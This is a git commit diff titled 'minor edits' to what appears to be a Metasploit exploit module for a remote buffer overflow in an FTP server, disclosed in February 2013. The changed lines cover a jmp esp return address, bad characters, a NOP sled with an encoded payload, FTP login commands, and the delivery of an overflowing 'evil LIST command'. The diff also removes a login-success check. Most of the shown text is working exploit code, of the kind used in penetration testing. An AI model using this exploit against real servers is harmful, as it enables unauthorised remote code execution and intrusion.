minor edits
parent
fa5c988110
commit
1f7b2a8e9f
|
@ -26,6 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'OSVDB', '90815'],
|
||||
[ 'EDB', '24557'],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/24557/'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -37,11 +38,10 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
{
|
||||
'Space' => 950,
|
||||
'BadChars' => "\x00\x0a\x0d\x20\xff",
|
||||
#'StackAdjustment' => -3500,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Universal', { 'Ret' => 0x10028283 } ], # jmp esp
|
||||
[ 'Automatic Targeting', { 'Ret' => 0x10028283, 'auto' => true } ], # jmp esp
|
||||
],
|
||||
'DisclosureDate' => 'Feb 27 2013'))
|
||||
|
||||
|
@ -61,14 +61,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
buf << make_nops(50) + payload.encoded
|
||||
sock.put("USER #{datastore['FTPUSER']}\r\n")
|
||||
sock.put("PASS #{datastore['FTPPASS']}\r\n")
|
||||
res = sock.get(-1,3)
|
||||
if(res.match(/230 Access allowed\./))
|
||||
print_good("Login successful")
|
||||
else
|
||||
print_status("Bad username/password")
|
||||
end
|
||||
sleep 1
|
||||
|
||||
sleep 0.5
|
||||
print_status("Sending evil LIST command")
|
||||
sock.put("LIST #{buf}\r\n")
|
||||
|
||||
|
|
Loading…
Reference in New Issue